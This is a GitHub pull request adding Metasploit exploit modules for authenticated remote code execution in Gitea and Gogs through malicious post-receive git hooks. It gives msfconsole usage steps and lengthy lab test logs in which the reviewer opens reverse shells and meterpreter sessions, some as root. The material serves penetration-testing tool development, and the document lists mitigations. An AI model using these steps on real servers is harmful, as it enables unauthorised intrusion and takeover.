Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Gitea and Gogs Git Hooks RCE #14978

Merged
merged 2 commits into from
Apr 7, 2021
Merged

Gitea and Gogs Git Hooks RCE #14978

merged 2 commits into from
Apr 7, 2021

Conversation

cdelafuente-r7
Copy link
Contributor

This adds 2 exploit modules for Gitea and Gogs self-hosted Git services. I added them both to a single PR since they are very similar (Gitea is a fork of Gogs) and, if anything needs to be updated after code review, it is very likely this would have to be done for both modules identically.

Both modules leverages an insecure setting to get remote code execution on the target OS in the context of the user running the application. This is possible when the current user is allowed to create git hooks, which is the default for administrative users. For non-administrative users, the permission needs to be specifically granted by an administrator.

To achieve code execution, the module authenticates to the web interface, creates a temporary repository, sets a post-receive git hook with the payload and creates a dummy file in the repository. This last action will trigger the
git hook and execute the payload. Everything is done through the web interface.

It has been mitigated in Gitea version 1.13.0 by setting the DISABLE_GIT_HOOKS configuration setting to true by default. This disables this feature and prevents all users (including admin) from creating custom git hooks. However, no mitigation has been implemented in Gogs so far (latest stable version is 0.12.3).

This has been tested successfully against Gitea Docker versions 1.12.5, 1.12.6 and 1.13.6 with DISABLE_GIT_HOOKS set to false, and on Gitea version 1.12.6 on Windows.
Also, this has been tested successfully against Gogs version 0.12.3 on Docker. Windows version could not be tested since the git hook feature seems to be broken.

Setup

Gitea

Follow the installation steps:

Gogs

Follow the installation steps:

Verification

Gitea

  • Install the application (follow Setup)
  • Start msfconsole
  • Do: use multi/http/gitea_git_hooks_rce
  • Do: set USERNAME <username>
  • Do: set PASSWORD <password>
  • Do: set rhosts <ip>
  • Do: set rport <port>
  • Do: set lhost <ip>
  • Do: set target <target #>
  • Do: run
  • You should get session.

Gogs

  • Install the application (follow Setup)
  • Start msfconsole
  • Do: use multi/http/gogs_git_hooks_rce
  • Do: set USERNAME <username>
  • Do: set PASSWORD <password>
  • Do: set rhosts <ip>
  • Do: set rport <port>
  • Do: set lhost <ip>
  • Do: set target <target #>
  • Do: run
  • You should get session.

adfoster-r7
adfoster-r7 reviewed Mar 31, 2021
View reviewed changes
modules/exploits/multi/http/gitea_git_hooks_rce.rb
Comment on lines +344 to +346
# HTTP client does not handle cookies with the same name correctly. It adds
# them instead of substituing the old value with the new one.
unless res.get_cookies.empty?
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

cc @agalway-r7 - might be worth checking that keep_cookies would've worked with this under #14831

@space-r7 space-r7 self-assigned this Apr 5, 2021
space-r7
space-r7 reviewed Apr 7, 2021
View reviewed changes
Copy link
Contributor

@space-r7 space-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hey @cdelafuente-r7, these look great! I had just a few really minor suggestions.

modules/exploits/multi/http/gitea_git_hooks_rce.rb Show resolved Hide resolved
modules/exploits/multi/http/gitea_git_hooks_rce.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/gogs_git_hooks_rce.rb Show resolved Hide resolved
modules/exploits/multi/http/gogs_git_hooks_rce.rb Outdated Show resolved Hide resolved
@mubix mubix mentioned this pull request Apr 7, 2021
Open
@space-r7
Copy link
Contributor

space-r7 commented Apr 7, 2021

Tested the gitea module against both a Linux installation and a Windows installation:

Gitea v1.12.5 - Linux 
msf6 > use exploit/multi/http/gitea_git_hooks_rce 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gitea_git_hooks_rce) > set rhost 192.168.37.133
rhost => 192.168.37.133
msf6 exploit(multi/http/gitea_git_hooks_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(multi/http/gitea_git_hooks_rce) > set rport 3000
rport => 3000
msf6 exploit(multi/http/gitea_git_hooks_rce) > set username administrator
username => administrator
msf6 exploit(multi/http/gitea_git_hooks_rce) > set password password
password => password
msf6 exploit(multi/http/gitea_git_hooks_rce) > options

Module options (exploit/multi/http/gitea_git_hooks_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   password         yes       Password to use
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.37.133   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file
                                         :<path>'
   RPORT      3000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   administrator    yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.37.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(multi/http/gitea_git_hooks_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Gitea version is 1.12.5
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Authenticate with "administrator/password"
[+] Logged in
[*] Create repository "Regrant_Zathin"
[+] Repository created
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created, shell incoming...
[*] Sending stage (3012516 bytes) to 192.168.37.133
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.133:38350) at 2021-04-07 11:15:26 -0500
[*] Command Stager progress - 100.00% done (833/833 bytes)
[*] Cleaning up
[*] Repository Regrant_Zathin deleted.

meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 192.168.37.133
OS           : Ubuntu 20.04 (Linux 5.8.0-48-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.37.133 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(multi/http/gitea_git_hooks_rce) > set target 0
target => 0
msf6 exploit(multi/http/gitea_git_hooks_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Gitea version is 1.12.5
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Authenticate with "administrator/password"
[+] Logged in
[*] Create repository "Keylex_It"
[+] Repository created
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created, shell incoming...
[*] Command shell session 2 opened (192.168.37.1:4444 -> 192.168.37.133:38356) at 2021-04-07 11:15:37 -0500
[*] Cleaning up
[*] Repository Keylex_It deleted.

whoami
root
uname -a
Linux ubuntu 5.8.0-48-generic #54~20.04.1-Ubuntu SMP Sat Mar 20 13:40:25 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 2? [y/N]  y
Gitea v1.12.2 - Windows 
msf6 exploit(multi/http/gitea_git_hooks_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Unix Command
   1   Linux Dropper
   2   Windows Command
   3   Windows Dropper


msf6 exploit(multi/http/gitea_git_hooks_rce) > set target 2
target => 2
msf6 exploit(multi/http/gitea_git_hooks_rce) > set rhost 192.168.37.132
rhost => 192.168.37.132
msf6 exploit(multi/http/gitea_git_hooks_rce) > set username space
username => space
msf6 exploit(multi/http/gitea_git_hooks_rce) > set password P@ssword1
password => P@ssword1
msf6 exploit(multi/http/gitea_git_hooks_rce) > run

[*] Started reverse SSL handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Gitea version is 1.12.2
[*] Executing Windows Command for cmd/windows/powershell_reverse_tcp
[*] Authenticate with "space/P@ssword1"
[+] Logged in
[*] Create repository "Kanlam_Ventosanzap"
[+] Repository created
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created, shell incoming...
[*] Powershell session session 3 opened (192.168.37.1:4444 -> 192.168.37.132:51254) at 2021-04-07 11:17:47 -0500
[*] Cleaning up
[*] Repository Kanlam_Ventosanzap deleted.

Windows PowerShell running as user space on DESKTOP-LFGB301
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\space\gitea-repositories\space\kanlam_ventosanzap.git>whoami
space
PS C:\Users\space\gitea-repositories\space\kanlam_ventosanzap.git> ^C
Abort session 3? [y/N]  y

[*] 192.168.37.132 - Powershell session session 3 closed.  Reason: User exit
msf6 exploit(multi/http/gitea_git_hooks_rce) > set target 3
target => 3
msf6 exploit(multi/http/gitea_git_hooks_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Gitea version is 1.12.2
[*] Executing Windows Dropper for windows/x64/meterpreter/reverse_tcp
[*] Authenticate with "space/P@ssword1"
[+] Logged in
[*] Create repository "Y-Solowarm_Alpha"
[+] Repository created
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created
[*] Command Stager progress -  20.14% done (2046/10161 bytes)
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created
[*] Command Stager progress -  40.27% done (4092/10161 bytes)
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created
[*] Command Stager progress -  60.41% done (6138/10161 bytes)
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created
[*] Command Stager progress -  80.54% done (8184/10161 bytes)
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created, shell incoming...
[*] Command Stager progress - 100.00% done (10161/10161 bytes)
[*] Sending stage (200262 bytes) to 192.168.37.132
[*] Meterpreter session 4 opened (192.168.37.1:4444 -> 192.168.37.132:51265) at 2021-04-07 11:19:14 -0500
[*] Cleaning up
[*] Repository Y-Solowarm_Alpha deleted.

meterpreter > getuid
Server username: DESKTOP-LFGB301\space
meterpreter > sysinfo
Computer        : DESKTOP-LFGB301
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

Only tested the latest version of Gogs on Linux:

Gogs v0.12.3 - Linux 
msf6 > use exploit/multi/http/gogs_git_hooks_rce 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gogs_git_hooks_rce) > set rhost 192.168.37.133
rhost => 192.168.37.133
msf6 exploit(multi/http/gogs_git_hooks_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(multi/http/gogs_git_hooks_rce) > set rport 3000
rport => 3000
msf6 exploit(multi/http/gogs_git_hooks_rce) > set username space
username => space
msf6 exploit(multi/http/gogs_git_hooks_rce) > set password P@ssword1
password => P@ssword1
msf6 exploit(multi/http/gogs_git_hooks_rce) > options

Module options (exploit/multi/http/gogs_git_hooks_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   P@ssword1        yes       Password to use
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.37.133   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file
                                         :<path>'
   RPORT      3000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   space            yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.37.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(multi/http/gogs_git_hooks_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Gogs found
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Authenticate with "space/P@ssword1"
[+] Logged in
[*] Create repository "Quo_Lux_Transcof"
[+] Repository created
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created, shell incoming...
[*] Sending stage (3012516 bytes) to 192.168.37.133
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.133:35238) at 2021-04-07 11:53:03 -0500
[*] Command Stager progress - 100.00% done (833/833 bytes)
[*] Cleaning up
[*] Repository Quo_Lux_Transcof deleted.

meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 192.168.37.133
OS           : Ubuntu 20.04 (Linux 5.8.0-48-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.37.133 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(multi/http/gogs_git_hooks_rce) > set target 0
target => 0
msf6 exploit(multi/http/gogs_git_hooks_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Gogs found
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Authenticate with "space/P@ssword1"
[+] Logged in
[*] Create repository "Greenlam_Sonair"
[+] Repository created
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created, shell incoming...
[*] Command shell session 2 opened (192.168.37.1:4444 -> 192.168.37.133:35242) at 2021-04-07 11:53:48 -0500
[*] Cleaning up
[*] Repository Greenlam_Sonair deleted.

whoami
root
uname -a
Linux ubuntu 5.8.0-48-generic #54~20.04.1-Ubuntu SMP Sat Mar 20 13:40:25 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 2? [y/N]  y

@cdelafuente-r7
Update from code review
1dfdb61 
- Set RPORT default value to 3000
- Use ternary operator
@cdelafuente-r7
Copy link
Contributor Author

Thanks for reviewing and testing this @space-r7 ! I believe I addressed all the comments in the last commit. Please, let me know if there is anything else that should be updated.

@space-r7
Copy link
Contributor

space-r7 commented Apr 7, 2021

Thanks for reviewing and testing this @space-r7 ! I believe I addressed all the comments in the last commit. Please, let me know if there is anything else that should be updated.

Looks good to me! Thanks much!

@space-r7 space-r7 merged commit 926f051 into rapid7:master Apr 7, 2021
@space-r7
Copy link
Contributor

space-r7 commented Apr 7, 2021
edited by pbarry-r7
Loading

Original Release Notes

This adds two modules, exploit/multi/http/gitea_git_hooks_rce and exploit/multi/http/gogs_git_hooks_rce that both leverage a git hooks setting to achieve authenticated remote code execution against vulnerable versions of Gitea and Gogs respectively. With valid credentials and the permission to create git hooks, both modules create a repo and upload a payload as a post-receive hook. Upon creating an additional file in the repo, the post-receive hook will be triggered, which will grant code execution as the user running the software.

@space-r7 space-r7 added the rn-modules release notes for new or majorly enhanced modules label Apr 7, 2021
@pbarry-r7
Copy link
Contributor

Release Notes

New module exploit/multi/http/gogs_git_hooks_rce leverages a git hooks setting to achieve authenticated remote code execution against vulnerable versions of Gogs (self-hosted Git service). With valid credentials and the permission to create git hooks, this module creates a repo and uploads a payload as a post-receive hook. Upon creating an additional file in the repo, the post-receive hook will be triggered, which will grant code execution as the user running the software.

New module exploit/multi/http/gitea_git_hooks_rce leverages a git hooks setting to achieve authenticated remote code execution against vulnerable versions of Gitea (self-hosted Git service). With valid credentials and the permission to create git hooks, this module creates a repo and uploads a payload as a post-receive hook. Upon creating an additional file in the repo, the post-receive hook will be triggered, which will grant code execution as the user running the software.

@cdelafuente-r7 cdelafuente-r7 deleted the gitea_gogs_rce branch May 4, 2021 11:36
@adfoster-r7 adfoster-r7 mentioned this pull request Sep 30, 2021
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@space-r7 space-r7 space-r7 left review comments

@adfoster-r7 adfoster-r7 adfoster-r7 left review comments

Assignees

@space-r7 space-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
5 participants
@cdelafuente-r7 @space-r7 @pbarry-r7 @adfoster-r7 @gwillcox-r7